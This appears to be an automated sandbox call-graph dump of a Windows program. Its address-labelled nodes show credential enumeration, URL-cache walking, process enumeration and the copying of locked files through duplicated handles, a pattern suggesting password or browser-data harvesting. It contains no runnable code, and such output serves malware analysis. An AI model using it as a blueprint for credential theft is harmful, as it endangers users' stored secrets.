38883->38821 38889 4456e2 38884->38889 38890 445c23 38885->38890 38886 445d83 38886->38821 38887->38881 39251 413fa6 _wcsicmp _wcsicmp 38889->39251 38894 409d1f 6 API calls 38890->38894 38892 445e12 38895 445e6b 38892->38895 38899 40b2cc 27 API calls 38892->38899 38897 445c37 38894->38897 39359 445093 23 API calls 38895->39359 38896 4456eb 38902 4456fd memset memset memset memset 38896->38902 38903 4457ea 38896->38903 38904 445389 258 API calls 38897->38904 38898 445b17 39332 40aebe 38898->39332 38906 445e33 38899->38906 39252 409c70 wcscpy wcsrchr 38902->39252 39255 413d29 38903->39255 38910 445c47 38904->38910 38911 409d1f 6 API calls 38906->38911 38908 445e7e 38913 445f67 38908->38913 38916 40b2cc 27 API calls 38910->38916 38917 445e47 38911->38917 38912->38776 39151 403e2d memset memset memset memset memset 38912->39151 38918 40b2cc 27 API calls 38913->38918 38914 445ab2 memset 38919 40b2cc 27 API calls 38914->38919 38921 445c53 38916->38921 39358 409b98 GetFileAttributesW 38917->39358 38923 445f73 38918->38923 38924 445aa1 38919->38924 38920 409c70 2 API calls 38925 44577e 38920->38925 38926 409d1f 6 API calls 38921->38926 38928 409d1f 6 API calls 38923->38928 38924->38898 38924->38914 38929 409d1f 6 API calls 38924->38929 39224 40add4 38924->39224 39229 445389 38924->39229 39238 40ae51 38924->39238 38930 409c70 2 API calls 38925->38930 38931 445c67 38926->38931 38927 445e56 38927->38895 38935 445e83 memset 38927->38935 38932 445f87 38928->38932 38929->38924 38933 44578d 38930->38933 38934 445389 258 API calls 38931->38934 39362 409b98 GetFileAttributesW 38932->39362 38933->38903 38940 40b2cc 27 API calls 38933->38940 38934->38794 38939 40b2cc 27 API calls 38935->38939 38938->38821 38938->38883 38941 445eab 38939->38941 38942 4457a8 38940->38942 38943 409d1f 6 API calls 38941->38943 38944 409d1f 6 API calls 38942->38944 38946 445ebf 38943->38946 38945 4457b8 38944->38945 39254 409b98 GetFileAttributesW 38945->39254 38948 40ae18 9 API calls 38946->38948 38952 445ef5 38948->38952 38949 4457c7 38949->38903 38951 4087b3 338 API calls 38949->38951 38950 40ae51 9 API calls 38950->38952 38951->38903 38952->38950 38953 445f5c 38952->38953 38955 40add4 2 API calls 38952->38955 38956 40b2cc 27 API calls 38952->38956 38957 409d1f 6 API calls 38952->38957 38959 445f3a 38952->38959 39360 409b98 GetFileAttributesW 38952->39360 38954 40aebe FindClose 38953->38954 38954->38913 38955->38952 38956->38952 38957->38952 39361 445093 23 API calls 38959->39361 38961->38758 38962->38760 38963->38758 38964->38753 38966 40c775 38965->38966 39363 40b1ab free free 38966->39363 38968 40c788 39364 40b1ab free free 38968->39364 38970 40c790 39365 40b1ab free free 38970->39365 38972 40c798 38973 40aa04 free 38972->38973 38974 40c7a0 38973->38974 39366 40c274 memset 38974->39366 38979 40a8ab 9 API calls 38980 40c7c3 38979->38980 38981 40a8ab 9 API calls 38980->38981 38982 40c7d0 38981->38982 39395 40c3c3 38982->39395 38986 40c877 38995 40bdb0 38986->38995 38987 40c86c 39437 4053fe 39 API calls 38987->39437 38993 40c7e5 38993->38986 38993->38987 38994 40c634 49 API calls 38993->38994 39420 40a706 38993->39420 38994->38993 39605 404363 38995->39605 38998 40bf5d 39625 40440c 38998->39625 39000 40bdee 39000->38998 39003 40b2cc 27 API calls 39000->39003 39001 40bddf CredEnumerateW 39001->39000 39004 40be02 wcslen 39003->39004 39004->38998 39014 40be1e 39004->39014 39005 40be26 wcsncmp 39005->39014 39008 40be7d memset 39009 40bea7 memcpy 39008->39009 39008->39014 39010 40bf11 wcschr 39009->39010 39009->39014 39010->39014 39011 40b2cc 27 API calls 39012 40bef6 _wcsnicmp 39011->39012 39012->39010 39012->39014 39013 40bf43 LocalFree 39013->39014 39014->38998 39014->39005 39014->39008 39014->39009 39014->39010 39014->39011 39014->39013 39628 40bd5d 28 API calls 39014->39628 39629 404423 39014->39629 39015 4135f7 39642 4135e0 39015->39642 39018 40b2cc 27 API calls 39019 41360d 39018->39019 39049 40399d 39048->39049 39671 403a16 39049->39671 39052 403a12 wcsrchr 39052->38784 39055 4039a3 39056 4039f4 39055->39056 39058 403a09 39055->39058 39682 40a02c CreateFileW 39055->39682 39057 4099c6 2 API calls 39056->39057 39056->39058 39057->39058 39685 40b1ab free free 39058->39685 39060 414c2e 16 API calls 39059->39060 39061 404048 39060->39061 39062 414c2e 16 API calls 39061->39062 39063 404056 39062->39063 39064 409d1f 6 API calls 39063->39064 39065 404073 39064->39065 39066 409d1f 6 API calls 39065->39066 39067 40408e 39066->39067 39068 409d1f 6 API calls 39067->39068 39069 4040a6 39068->39069 39070 403af5 20 API calls 39069->39070 39071 4040ba 39070->39071 39072 403af5 20 API calls 39071->39072 39073 4040cb 39072->39073 39712 40414f memset 39073->39712 39075 404140 39726 40b1ab free free 39075->39726 39076 4040ec memset 39080 4040e0 39076->39080 39078 404148 39078->38838 39079 4099c6 2 API calls 39079->39080 39080->39075 39080->39076 39080->39079 39081 40a8ab 9 API calls 39080->39081 39081->39080 39739 40a6e6 WideCharToMultiByte 39082->39739 39084 4087ed 39740 4095d9 memset 39084->39740 39134 40b633 free 39133->39134 39135 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39134->39135 39136 413f00 Process32NextW 39135->39136 39137 413da5 OpenProcess 39136->39137 39138 413f17 CloseHandle 39136->39138 39139 413eb0 39137->39139 39140 413df3 memset 39137->39140 39138->38878 39139->39136 39142 413ebf free 39139->39142 39143 4099f4 3 API calls 39139->39143 39978 413f27 39140->39978 39142->39139 39143->39139 39145 413e37 GetModuleHandleW 39147 413e1f 39145->39147 39148 413e46 GetProcAddress 39145->39148 39146 413e6a QueryFullProcessImageNameW 39146->39147 39147->39145 39147->39146 39983 413959 39147->39983 39999 413ca4 39147->39999 39148->39147 39150 413ea2 CloseHandle 39150->39139 39152 414c2e 16 API calls 39151->39152 39153 403eb7 39152->39153 39154 414c2e 16 API calls 39153->39154 39155 403ec5 39154->39155 39156 409d1f 6 API calls 39155->39156 39157 403ee2 39156->39157 39158 409d1f 6 API calls 39157->39158 39159 403efd 39158->39159 39160 409d1f 6 API calls 39159->39160 39161 403f15 39160->39161 39162 403af5 20 API calls 39161->39162 39163 403f29 39162->39163 39164 403af5 20 API calls 39163->39164 39165 403f3a 39164->39165 39166 40414f 33 API calls 39165->39166 39172 403f4f 39166->39172 39167 403faf 40013 40b1ab free free 39167->40013 39169 403f5b memset 39169->39172 39170 403fb7 39170->38824 39171 4099c6 2 API calls 39171->39172 39172->39167 39172->39169 39172->39171 39173 40a8ab 9 API calls 39172->39173 39173->39172 39175 414c2e 16 API calls 39174->39175 39176 403d26 39175->39176 39177 414c2e 16 API calls 39176->39177 39178 403d34 39177->39178 39179 409d1f 6 API calls 39178->39179 39180 403d51 39179->39180 39181 409d1f 6 API calls 39180->39181 39182 403d6c 39181->39182 39183 409d1f 6 API calls 39182->39183 39184 403d84 39183->39184 39185 403af5 20 API calls 39184->39185 39186 403d98 39185->39186 39187 403af5 20 API calls 39186->39187 39188 403da9 39187->39188 39189 40414f 33 API calls 39188->39189 39195 403dbe 39189->39195 39190 403e1e 40014 40b1ab free free 39190->40014 39191 403dca memset 39191->39195 39193 403e26 39193->38827 39194 4099c6 2 API calls 39194->39195 39195->39190 39195->39191 39195->39194 39196 40a8ab 9 API calls 39195->39196 39196->39195 39198 414b81 9 API calls 39197->39198 39199 414c40 39198->39199 39200 414c73 memset 39199->39200 40015 409cea 39199->40015 39204 414c94 39200->39204 39203 414c64 39203->38819 40018 414592 RegOpenKeyExW 39204->40018 39206 414cc1 39207 414cf4 wcscpy 39206->39207 40019 414bb0 wcscpy 39206->40019 39207->39203 39209 414cd2 40020 4145ac RegQueryValueExW 39209->40020 39211 414ce9 RegCloseKey 39211->39207 39213 409d43 wcscpy 39212->39213 39215 409d62 39212->39215 39214 409719 2 API calls 39213->39214 39216 409d51 wcscat 39214->39216 39215->38858 39216->39215 39218 40aebe FindClose 39217->39218 39219 40ae21 39218->39219 39220 4099c6 2 API calls 39219->39220 39221 40ae35 39220->39221 39222 409d1f 6 API calls 39221->39222 39223 40ae49 39222->39223 39223->38924 39225 40ade0 39224->39225 39226 40ae0f 39224->39226 39225->39226 39227 40ade7 wcscmp 39225->39227 39226->38924 39227->39226 39228 40adfe wcscmp 39227->39228 39228->39226 39230 40ae18 9 API calls 39229->39230 39236 4453c4 39230->39236 39231 40ae51 9 API calls 39231->39236 39232 4453f3 39233 40aebe FindClose 39232->39233 39235 4453fe 39233->39235 39234 40add4 2 API calls 39234->39236 39235->38924 39236->39231 39236->39232 39236->39234 39237 445403 253 API calls 39236->39237 39237->39236 39239 40ae7b FindNextFileW 39238->39239 39240 40ae5c FindFirstFileW 39238->39240 39241 40ae94 39239->39241 39242 40ae8f 39239->39242 39240->39241 39244 40aeb6 39241->39244 39245 409d1f 6 API calls 39241->39245 39243 40aebe FindClose 39242->39243 39243->39241 39244->38924 39245->39244 39248->38881 39249->38865 39250->38865 39251->38896 39253 409c89 39252->39253 39253->38920 39254->38949 39256 413d39 39255->39256 39257 413d2f FreeLibrary 39255->39257 39258 40b633 free 39256->39258 39257->39256 39259 413d42 39258->39259 39260 40b633 free 39259->39260 39261 413d4a 39260->39261 39261->38912 39262->38776 39263->38777 39264->38850 39266 44db70 39265->39266 39267 40b6fc memset 39266->39267 39268 409c70 2 API calls 39267->39268 39269 40b732 wcsrchr 39268->39269 39270 40b743 39269->39270 39271 40b746 memset 39269->39271 39270->39271 39272 40b2cc 27 API calls 39271->39272 39273 40b76f 39272->39273 39274 409d1f 6 API calls 39273->39274 39275 40b783 39274->39275 40021 409b98 GetFileAttributesW 39275->40021 39277 40b792 39278 409c70 2 API calls 39277->39278 39292 40b7c2 39277->39292 39280 40b7a5 39278->39280 39282 40b2cc 27 API calls 39280->39282 39286 40b7b2 39282->39286 39283 40b837 CloseHandle 39285 40b83e memset 39283->39285 39284 40b817 40055 409a45 GetTempPathW 39284->40055 40058 40a6e6 WideCharToMultiByte 39285->40058 39290 409d1f 6 API calls 39286->39290 39288 40b827 CopyFileW 39288->39285 39290->39292 39291 40b866 39293 444432 121 API calls 39291->39293 40022 40bb98 39292->40022 39294 40b879 39293->39294 39295 40bad5 39294->39295 39296 40b273 27 API calls 39294->39296 39297 40baeb 39295->39297 39298 40bade DeleteFileW 39295->39298 39299 40b89a 39296->39299 39300 40b04b ??3@YAXPAX 39297->39300 39298->39297 39301 438552 134 API calls 39299->39301 39302 40baf3 39300->39302 39303 40b8a4 39301->39303 39302->38779 39304 40bacd 39303->39304 39306 4251c4 137 API calls 39303->39306 39305 443d90 111 API calls 39304->39305 39305->39295 39329 40b8b8 39306->39329 39307 40bac6 40068 424f26 123 API calls 39307->40068 39308 40b8bd memset 40059 425413 17 API calls 39308->40059 39311 425413 17 API calls 39311->39329 39314 40a71b MultiByteToWideChar 39314->39329 39315 40a734 MultiByteToWideChar 39315->39329 39318 40b9b5 memcmp 39318->39329 39319 4099c6 2 API calls 39319->39329 39320 404423 37 API calls 39320->39329 39323 40bb3e memset memcpy 40069 40a734 MultiByteToWideChar 39323->40069 39324 4251c4 137 API calls 39324->39329 39326 40bb88 LocalFree 39326->39329 39329->39307 39329->39308 39329->39311 39329->39314 39329->39315 39329->39318 39329->39319 39329->39320 39329->39323 39329->39324 39330 40ba5f memcmp 39329->39330 40060 4253ef 16 API calls 39329->40060 40061 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39329->40061 40062 4253af 17 API calls 39329->40062 40063 4253cf 17 API calls 39329->40063 40064 447280 memset 39329->40064 40065 447960 memset memcpy memcpy memcpy 39329->40065 40066 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39329->40066 40067 447920 memcpy memcpy memcpy 39329->40067 39330->39329 39331->38854 39333 40aed1 39332->39333 39334 40aec7 FindClose 39332->39334 39333->38789 39334->39333 39336 4099d7 39335->39336 39337 4099da memcpy 39335->39337 39336->39337 39337->38837 39339 40b2cc 27 API calls 39338->39339 39340 44543f 39339->39340 39341 409d1f 6 API calls 39340->39341 39342 44544f 39341->39342 40161 409b98 GetFileAttributesW 39342->40161 39344 445476 39347 40b2cc 27 API calls 39344->39347 39345 44545e 39345->39344 39346 40b6ef 252 API calls 39345->39346 39346->39344 39348 445482 39347->39348 39349 409d1f 6 API calls 39348->39349 39350 445492 39349->39350 40162 409b98 GetFileAttributesW 39350->40162 39352 4454a1 39353 4454b9 39352->39353 39354 40b6ef 252 API calls 39352->39354 39353->38863 39354->39353 39355->38862 39356->38886 39357->38892 39358->38927 39359->38908 39360->38952 39361->38952 39362->38938 39363->38968 39364->38970 39365->38972 39367 414c2e 16 API calls 39366->39367 39368 40c2ae 39367->39368 39438 40c1d3 39368->39438 39373 40c3be 39390 40a8ab 39373->39390 39374 40afcf 2 API calls 39375 40c2fd FindFirstUrlCacheEntryW 39374->39375 39376 40c3b6 39375->39376 39377 40c31e wcschr 39375->39377 39378 40b04b ??3@YAXPAX 39376->39378 39379 40c331 39377->39379 39380 40c35e FindNextUrlCacheEntryW 39377->39380 39378->39373 39381 40a8ab 9 API calls 39379->39381 39380->39377 39382 40c373 GetLastError 39380->39382 39385 40c33e wcschr 39381->39385 39383 40c3ad FindCloseUrlCache 39382->39383 39384 40c37e 39382->39384 39383->39376 39386 40afcf 2 API calls 39384->39386 39385->39380 39387 40c34f 39385->39387 39388 40c391 FindNextUrlCacheEntryW 39386->39388 39389 40a8ab 9 API calls 39387->39389 39388->39377 39388->39383 39389->39380 39532 40a97a 39390->39532 39393 40a8cc 39393->38979 39394 40a8d0 7 API calls 39394->39393 39537 40b1ab free free 39395->39537 39397 40c3dd 39398 40b2cc 27 API calls 39397->39398 39399 40c3e7 39398->39399 39538 414592 RegOpenKeyExW 39399->39538 39401 40c3f4 39402 40c50e 39401->39402 39403 40c3ff 39401->39403 39417 405337 39402->39417 39404 40a9ce 4 API calls 39403->39404 39405 40c418 memset 39404->39405 39539 40aa1d 39405->39539 39408 40c471 39410 40c47a _wcsupr 39408->39410 39409 40c505 RegCloseKey 39409->39402 39411 40a8d0 7 API calls 39410->39411 39412 40c498 39411->39412 39413 40a8d0 7 API calls 39412->39413 39414 40c4ac memset 39413->39414 39415 40aa1d 39414->39415 39416 40c4e4 RegEnumValueW 39415->39416 39416->39409 39416->39410 39541 405220 39417->39541 39421 4099c6 2 API calls 39420->39421 39422 40a714 _wcslwr 39421->39422 39423 40c634 39422->39423 39598 405361 39423->39598 39426 40c65c wcslen 39601 4053b6 39 API calls 39426->39601 39427 40c71d wcslen 39427->38993 39429 40c677 39430 40c713 39429->39430 39602 40538b 39 API calls 39429->39602 39604 4053df 39 API calls 39430->39604 39433 40c6a5 39433->39430 39434 40c6a9 memset 39433->39434 39435 40c6d3 39434->39435 39603 40c589 43 API calls 39435->39603 39437->38986 39439 40ae18 9 API calls 39438->39439 39445 40c210 39439->39445 39440 40ae51 9 API calls 39440->39445 39441 40c264 39442 40aebe FindClose 39441->39442 39444 40c26f 39442->39444 39443 40add4 2 API calls 39443->39445 39450 40e5ed memset memset 39444->39450 39445->39440 39445->39441 39445->39443 39446 40c231 _wcsicmp 39445->39446 39447 40c1d3 35 API calls 39445->39447 39446->39445 39448 40c248 39446->39448 39447->39445 39463 40c084 22 API calls 39448->39463 39451 414c2e 16 API calls 39450->39451 39452 40e63f 39451->39452 39453 409d1f 6 API calls 39452->39453 39454 40e658 39453->39454 39464 409b98 GetFileAttributesW 39454->39464 39456 40e667 39457 40e680 39456->39457 39458 409d1f 6 API calls 39456->39458 39465 409b98 GetFileAttributesW 39457->39465 39458->39457 39460 40e68f 39462 40c2d8 39460->39462 39466 40e4b2 39460->39466 39462->39373 39462->39374 39463->39445 39464->39456 39465->39460 39487 40e01e 39466->39487 39468 40e593 39469 40e5b0 39468->39469 39470 40e59c DeleteFileW 39468->39470 39472 40b04b ??3@YAXPAX 39469->39472 39470->39469 39471 40e521 39471->39468 39510 40e175 39471->39510 39473 40e5bb 39472->39473 39475 40e5c4 CloseHandle 39473->39475 39476 40e5cc 39473->39476 39475->39476 39478 40b633 free 39476->39478 39477 40e573 39480 40e584 39477->39480 39481 40e57c CloseHandle 39477->39481 39479 40e5db 39478->39479 39483 40b633 free 39479->39483 39531 40b1ab free free 39480->39531 39481->39480 39482 40e540 39482->39477 39530 40e2ab 30 API calls 39482->39530 39485 40e5e3 39483->39485 39485->39462 39488 406214 22 API calls 39487->39488 39489 40e03c 39488->39489 39490 40e16b 39489->39490 39491 40dd85 75 API calls 39489->39491 39490->39471 39492 40e06b 39491->39492 39492->39490 39493 40afcf ??2@YAPAXI ??3@YAXPAX 39492->39493 39494 40e08d OpenProcess 39493->39494 39495 40e0a4 GetCurrentProcess DuplicateHandle 39494->39495 39499 40e152 39494->39499 39496 40e0d0 GetFileSize 39495->39496 39497 40e14a CloseHandle 39495->39497 39500 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39496->39500 39497->39499 39498 40e160 39502 40b04b ??3@YAXPAX 39498->39502 39499->39498 39501 406214 22 API calls 39499->39501 39503 40e0ea 39500->39503 39501->39498 39502->39490 39504 4096dc CreateFileW 39503->39504 39505 40e0f1 CreateFileMappingW 39504->39505 39506 40e140 CloseHandle CloseHandle 39505->39506 39507 40e10b MapViewOfFile 39505->39507 39506->39497 39508 40e13b CloseHandle 39507->39508 39509 40e11f WriteFile UnmapViewOfFile 39507->39509 39508->39506 39509->39508 39511 40e18c 39510->39511 39512 406b90 11 API calls 39511->39512 39513 40e19f 39512->39513 39514 40e1a7 memset 39513->39514 39515 40e299 39513->39515 39520 40e1e8 39514->39520 39516 4069a3 ??3@YAXPAX free 39515->39516 39517 40e2a4 39516->39517 39517->39482 39518 406e8f 13 API calls 39518->39520 39519 406b53 SetFilePointerEx ReadFile 39519->39520 39520->39518 39520->39519 39521 40e283 39520->39521 39522 40dd50 _wcsicmp 39520->39522 39526 40742e 8 API calls 39520->39526 39527 40aae3 wcslen wcslen _memicmp 39520->39527 39528 40e244 _snwprintf 39520->39528 39523 40e291 39521->39523 39524 40e288 free 39521->39524 39522->39520 39525 40aa04 free 39523->39525 39524->39523 39525->39515 39526->39520 39527->39520 39529 40a8d0 7 API calls 39528->39529 39529->39520 39530->39482 39531->39468 39534 40a980 39532->39534 39533 40a8bb 39533->39393 39533->39394 39534->39533 39535 40a995 _wcsicmp 39534->39535 39536 40a99c wcscmp 39534->39536 39535->39534 39536->39534 39537->39397 39538->39401 39540 40aa23 RegEnumValueW 39539->39540 39540->39408 39540->39409 39542 405335 39541->39542 39543 40522a 39541->39543 39542->38993 39544 40b2cc 27 API calls 39543->39544 39545 405234 39544->39545 39546 40a804 8 API calls 39545->39546 39547 40523a 39546->39547 39586 40b273 39547->39586 39549 405248 _mbscpy _mbscat GetProcAddress 39550 40b273 27 API calls 39549->39550 39551 405279 39550->39551 39589 405211 GetProcAddress 39551->39589 39553 405282 39554 40b273 27 API calls 39553->39554 39555 40528f 39554->39555 39590 405211 GetProcAddress 39555->39590 39557 405298 39558 40b273 27 API calls 39557->39558 39587 40b58d 27 API calls 39586->39587 39588 40b18c 39587->39588 39588->39549 39589->39553 39590->39557 39599 405220 39 API calls 39598->39599 39600 405369 39599->39600 39600->39426 39600->39427 39601->39429 39602->39433 39603->39430 39604->39427 39606 40440c FreeLibrary 39605->39606 39607 40436d 39606->39607 39608 40a804 8 API calls 39607->39608 39609 404377 39608->39609 39610 404383 39609->39610 39611 404405 39609->39611 39612 40b273 27 API calls 39610->39612 39611->38998 39611->39000 39611->39001 39613 40438d GetProcAddress 39612->39613 39614 40b273 27 API calls 39613->39614 39615 4043a7 GetProcAddress 39614->39615 39616 40b273 27 API calls 39615->39616 39617 4043ba GetProcAddress 39616->39617 39618 40b273 27 API calls 39617->39618 39619 4043ce GetProcAddress 39618->39619 39626 404413 FreeLibrary 39625->39626 39627 40441e 39625->39627 39626->39627 39627->39015 39628->39014 39630 40442e 39629->39630 39632 40447e 39629->39632 39631 40b2cc 27 API calls 39630->39631 39633 404438 39631->39633 39632->39014 39643 4135f6 39642->39643 39644 4135eb FreeLibrary 39642->39644 39643->39018 39644->39643 39672 403a29 39671->39672 39686 403bed memset memset 39672->39686 39674 403ae7 39699 40b1ab free free 39674->39699 39675 403a3f memset 39680 403a2f 39675->39680 39677 403aef 39677->39055 39678 409d1f 6 API calls 39678->39680 39679 409b98 GetFileAttributesW 39679->39680 39680->39674 39680->39675 39680->39678 39680->39679 39681 40a8d0 7 API calls 39680->39681 39681->39680 39683 40a051 GetFileTime CloseHandle 39682->39683 39684 4039ca CompareFileTime 39682->39684 39683->39684 39684->39055 39685->39052 39687 414c2e 16 API calls 39686->39687 39688 403c38 39687->39688 39689 409719 2 API calls 39688->39689 39690 403c3f wcscat 39689->39690 39691 414c2e 16 API calls 39690->39691 39692 403c61 39691->39692 39693 409719 2 API calls 39692->39693 39694 403c68 wcscat 39693->39694 39700 403af5 39694->39700 39697 403af5 20 API calls 39698 403c95 39697->39698 39698->39680 39699->39677 39701 403b02 39700->39701 39702 40ae18 9 API calls 39701->39702 39704 403b37 39702->39704 39703 40ae51 9 API calls 39703->39704 39704->39703 39705 403bdb 39704->39705 39706 40add4 wcscmp wcscmp 39704->39706 39709 40ae18 9 API calls 39704->39709 39710 40aebe FindClose 39704->39710 39711 40a8d0 7 API calls 39704->39711 39707 40aebe FindClose 39705->39707 39706->39704 39708 403be6 39707->39708 39708->39697 39709->39704 39710->39704 39711->39704 39713 409d1f 6 API calls 39712->39713 39714 404190 39713->39714 39727 409b98 GetFileAttributesW 39714->39727 39716 40419c 39717 4041a7 6 API calls 39716->39717 39718 40435c 39716->39718 39720 40424f 39717->39720 39718->39080 39720->39718 39721 40425e memset 39720->39721 39723 409d1f 6 API calls 39720->39723 39724 40a8ab 9 API calls 39720->39724 39728 414842 39720->39728 39721->39720 39722 404296 wcscpy 39721->39722 39722->39720 39723->39720 39725 4042b6 memset memset _snwprintf wcscpy 39724->39725 39725->39720 39726->39078 39727->39716 39731 41443e 39728->39731 39730 414866 39730->39720 39732 41444b 39731->39732 39733 414451 39732->39733 39734 4144a3 GetPrivateProfileStringW 39732->39734 39735 414491 39733->39735 39736 414455 wcschr 39733->39736 39734->39730 39738 414495 WritePrivateProfileStringW 39735->39738 39736->39735 39737 414463 _snwprintf 39736->39737 39737->39738 39738->39730 39739->39084 39741 40b2cc 27 API calls 39740->39741 39742 409615 39741->39742 39743 409d1f 6 API calls 39742->39743 40005 413f4f 39978->40005 39981 413f37 K32GetModuleFileNameExW 39982 413f4a 39981->39982 39982->39147 39984 413969 wcscpy 39983->39984 39985 41396c wcschr 39983->39985 39988 413a3a 39984->39988 39985->39984 39987 41398e 39985->39987 40010 4097f7 wcslen wcslen _memicmp 39987->40010 39988->39147 39990 41399a 39991 4139a4 memset 39990->39991 39992 4139e6 39990->39992 40011 409dd5 GetWindowsDirectoryW wcscpy 39991->40011 39994 413a31 wcscpy 39992->39994 39995 4139ec memset 39992->39995 39994->39988 40012 409dd5 GetWindowsDirectoryW wcscpy 39995->40012 39996 4139c9 wcscpy wcscat 39996->39988 39998 413a11 memcpy wcscat 39998->39988 40000 413cb0 GetModuleHandleW 39999->40000 40001 413cda 39999->40001 40000->40001 40002 413cbf GetProcAddress 40000->40002 40003 413ce3 GetProcessTimes 40001->40003 40004 413cf6 40001->40004 40002->40001 40003->39150 40004->39150 40006 413f2f 40005->40006 40007 413f54 40005->40007 40006->39981 40006->39982 40008 40a804 8 API calls 40007->40008 40009 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40008->40009 40009->40006 40010->39990 40011->39996 40012->39998 40013->39170 40014->39193 40016 409cf9 GetVersionExW 40015->40016 40017 409d0a 40015->40017 40016->40017 40017->39200 40017->39203 40018->39206 40019->39209 40020->39211 40021->39277 40023 40bba5 40022->40023 40070 40cc26 40023->40070 40026 40bd4b 40091 40cc0c 40026->40091 40031 40b2cc 27 API calls 40032 40bbef 40031->40032 40098 40ccf0 _wcsicmp 40032->40098 40034 40bbf5 40034->40026 40099 40ccb4 6 API calls 40034->40099 40036 40bc26 40037 40cf04 17 API calls 40036->40037 40038 40bc2e 40037->40038 40039 40bd43 40038->40039 40040 40b2cc 27 API calls 40038->40040 40041 40cc0c 4 API calls 40039->40041 40042 40bc40 40040->40042 40041->40026 40100 40ccf0 _wcsicmp 40042->40100 40044 40bc46 40044->40039 40045 40bc61 memset memset WideCharToMultiByte 40044->40045 40101 40103c strlen 40045->40101 40047 40bcc0 40048 40b273 27 API calls 40047->40048 40049 40bcd0 memcmp 40048->40049 40049->40039 40050 40bce2 40049->40050 40051 404423 37 API calls 40050->40051 40052 40bd10 40051->40052 40052->40039 40053 40bd3a LocalFree 40052->40053 40054 40bd1f memcpy 40052->40054 40053->40039 40054->40053 40056 409a74 GetTempFileNameW 40055->40056 40057 409a66 GetWindowsDirectoryW 40055->40057 40056->39288 40057->40056 40058->39291 40059->39329 40060->39329 40061->39329 40062->39329 40063->39329 40064->39329 40065->39329 40066->39329 40067->39329 40068->39304 40069->39326 40102 4096c3 CreateFileW 40070->40102 40072 40cc34 40073 40cc3d GetFileSize 40072->40073 40074 40bbca 40072->40074 40075 40afcf 2 API calls 40073->40075 40074->40026 40082 40cf04 40074->40082 40076 40cc64 40075->40076 40103 40a2ef ReadFile 40076->40103 40078 40cc71 40104 40ab4a MultiByteToWideChar 40078->40104 40080 40cc95 CloseHandle 40081 40b04b ??3@YAXPAX 40080->40081 40081->40074 40083 40b633 free 40082->40083 40084 40cf14 40083->40084 40110 40b1ab free free 40084->40110 40086 40bbdd 40086->40026 40086->40031 40087 40cf1b 40087->40086 40089 40cfef 40087->40089 40111 40cd4b 40087->40111 40090 40cd4b 14 API calls 40089->40090 40090->40086 40092 40b633 free 40091->40092 40093 40cc15 40092->40093 40094 40aa04 free 40093->40094 40095 40cc1d 40094->40095 40160 40b1ab free free 40095->40160 40097 40b7d4 memset CreateFileW 40097->39283 40097->39284 40098->40034 40099->40036 40100->40044 40101->40047 40102->40072 40103->40078 40105 40ab6b 40104->40105 40109 40ab93 40104->40109 40106 40a9ce 4 API calls 40105->40106 40107 40ab74 40106->40107 40108 40ab7c MultiByteToWideChar 40107->40108 40108->40109 40109->40080 40110->40087 40112 40cd7b 40111->40112 40145 40aa29 40112->40145 40114 40cef5 40115 40aa04 free 40114->40115 40116 40cefd 40115->40116 40116->40087 40118 40aa29 6 API calls 40119 40ce1d 40118->40119 40120 40aa29 6 API calls 40119->40120 40121 40ce3e 40120->40121 40122 40ce6a 40121->40122 40153 40abb7 wcslen memmove 40121->40153 40123 40ce9f 40122->40123 40156 40abb7 wcslen memmove 40122->40156 40125 40a8d0 7 API calls 40123->40125 40128 40ceb5 40125->40128 40126 40ce56 40154 40aa71 wcslen 40126->40154 40135 40a8d0 7 API calls 40128->40135 40130 40ce8b 40157 40aa71 wcslen 40130->40157 40131 40ce5e 40155 40abb7 wcslen memmove 40131->40155 40133 40ce93 40158 40abb7 wcslen memmove 40133->40158 40137 40cecb 40135->40137 40159 40d00b malloc memcpy free free 40137->40159 40139 40cedd 40140 40aa04 free 40139->40140 40141 40cee5 40140->40141 40142 40aa04 free 40141->40142 40143 40ceed 40142->40143 40144 40aa04 free 40143->40144 40144->40114 40146 40aa33 40145->40146 40152 40aa63 40145->40152 40147 40aa44 40146->40147 40148 40aa38 wcslen 40146->40148 40149 40a9ce malloc memcpy free free 40147->40149 40148->40147 40150 40aa4d 40149->40150 40151 40aa51 memcpy 40150->40151 40150->40152 40151->40152 40152->40114 40152->40118 40153->40126 40154->40131 40155->40122 40156->40130 40157->40133 40158->40123 40159->40139 40160->40097 40161->39345 40162->39352 40172 44def7 40173 44df07 40172->40173 40174 44df00 ??3@YAXPAX 40172->40174 40175 44df17 40173->40175 40176 44df10 ??3@YAXPAX 40173->40176 40174->40173 40177 44df27 40175->40177 40178 44df20 ??3@YAXPAX 40175->40178 40176->40175 40179 44df37 40177->40179 40180 44df30 ??3@YAXPAX 40177->40180 40178->40177 40180->40179 37537 44dea5 37538 44deb5 FreeLibrary 37537->37538 37539 44dec3 37537->37539 37538->37539 40181 4148b6 FindResourceW 40182 4148f9 40181->40182 40183 4148cf SizeofResource 40181->40183 40183->40182 40184 4148e0 LoadResource 40183->40184 40184->40182 40185 4148ee LockResource 40184->40185 40185->40182 37716 415304 free 40186 441b3f 40196 43a9f6 40186->40196 40188 441b61 40369 4386af memset 40188->40369 40190 44189a 40191 442bd4 40190->40191 40192 4418e2 40190->40192 40193 4418ea 40191->40193 40371 441409 memset 40191->40371 40192->40193 40370 4414a9 12 API calls 40192->40370 40197 43aa20 40196->40197 40198 43aadf 40196->40198 40197->40198 40199 43aa34 memset 40197->40199 40198->40188 40200 43aa56 40199->40200 40201 43aa4d 40199->40201 40372 43a6e7 40200->40372 40380 42c02e memset 40201->40380 40206 43aad3 40382 4169a7 11 API calls 40206->40382 40207 43aaae 40207->40198 40207->40206 40222 43aae5 40207->40222 40208 43ac18 40211 43ac47 40208->40211 40384 42bbd5 memcpy memcpy memcpy memset memcpy 40208->40384 40212 43aca8 40211->40212 40385 438eed 16 API calls 40211->40385 40215 43acd5 40212->40215 40387 4233ae 11 API calls 40212->40387 40388 423426 11 API calls 40215->40388 40216 43ac87 40386 4233c5 16 API calls 40216->40386 40220 43ace1 40389 439811 163 API calls 40220->40389 40221 43a9f6 161 API calls 40221->40222 40222->40198 40222->40208 40222->40221 40383 439bbb 22 API calls 40222->40383 40224 43acfd 40229 43ad2c 40224->40229 40390 438eed 16 API calls 40224->40390 40226 43ad19 40391 4233c5 16 API calls 40226->40391 40227 43ad58 40392 44081d 163 API calls 40227->40392 